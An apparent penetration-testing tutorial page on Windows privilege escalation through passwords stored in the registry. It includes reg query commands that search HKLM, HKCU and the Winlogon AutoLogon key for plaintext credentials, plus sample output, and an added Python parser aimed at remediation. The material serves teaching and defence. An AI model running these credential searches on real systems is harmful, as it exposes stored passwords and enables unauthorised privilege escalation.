Attacks - Windows Privilege Escalation

Registry - Passwords

What is the Registry?

The Windows Registry is like a big database that the operating system uses to store information about the system, software, hardware, user preferences, and settings. It's essential for Windows to function properly and is often called the "brain" of Windows configuration.

Enumeration

To search for passwords in the registry, you can use the reg command:

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

  • HKLM: Refers to the HKEY_LOCAL_MACHINE root key (system-wide settings).
  • HKCU: Refers to the HKEY_CURRENT_USER root key (user-specific settings).
  • /f password: Searches for registry keys, values, or data that include the keyword password.
  • /t REG_SZ: Limits the search to registry values of type string (REG_SZ).
  • /s: Recursively searches all subkeys and values.

Output example:

HKEY_LOCAL_MACHINE\SOFTWARE\SomeApp
    Password    REG_SZ    P@ssw0rd123

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    MySecretPass

Alternatively, we can query a specific key for passwords.

Query this specific key to find admin AutoLogon credentials:

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
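
The same reg query output can be turned into a remediation list. The following is an added example, not part of the original page: it parses output in the format shown in the output example above and reports where secret-looking string values are stored, giving only their length. The function name, the name patterns and the OldPassword sample line are assumptions made for illustration.

```python
import re

# reg.exe prints each value as: 4-space indent, name, type and data, separated
# by 4 spaces. The data column is missing when the value is empty.
VALUE_RE = re.compile(
    r"^ {4}(?P<name>.+?) {4}(?P<type>REG_[A-Z_]+)(?: {4}(?P<data>.*))?$")
SECRET_NAME_RE = re.compile(r"password|passwd|pwd", re.IGNORECASE)  # assumed patterns
WINLOGON = r"\microsoft\windows nt\currentversion\winlogon"

def find_stored_passwords(reg_output):
    """Return one finding per non-empty string value with a secret-like name.

    Only the length of the data is reported, so the result can go into a
    ticket without copying the credential.
    """
    findings, key = [], None
    for line in reg_output.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m is None or key is None:
            continue  # blank line or the "End of search" footer
        name, data = m.group("name"), (m.group("data") or "").strip()
        if m.group("type") not in ("REG_SZ", "REG_EXPAND_SZ") or not data:
            continue
        if not SECRET_NAME_RE.search(name):
            continue
        if key.lower().endswith(WINLOGON) and name.lower() == "defaultpassword":
            fix = "turn off AutoAdminLogon, delete DefaultPassword, rotate the password"
        else:
            fix = "move the secret out of the registry and rotate it"
        findings.append({"key": key, "value": name, "length": len(data), "fix": fix})
    return findings

# Constructed sample: the two entries from the output example above, plus an
# empty value (OldPassword) and the footer line, both added for illustration.
SAMPLE = "\n".join([
    r"HKEY_LOCAL_MACHINE\SOFTWARE\SomeApp",
    r"    Password    REG_SZ    P@ssw0rd123",
    r"    OldPassword    REG_SZ",
    "",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
    r"    DefaultPassword    REG_SZ    MySecretPass",
    "",
    "End of search: 3 match(es) found.",
])

if __name__ == "__main__":
    for finding in find_stored_passwords(SAMPLE):
        print(finding)
```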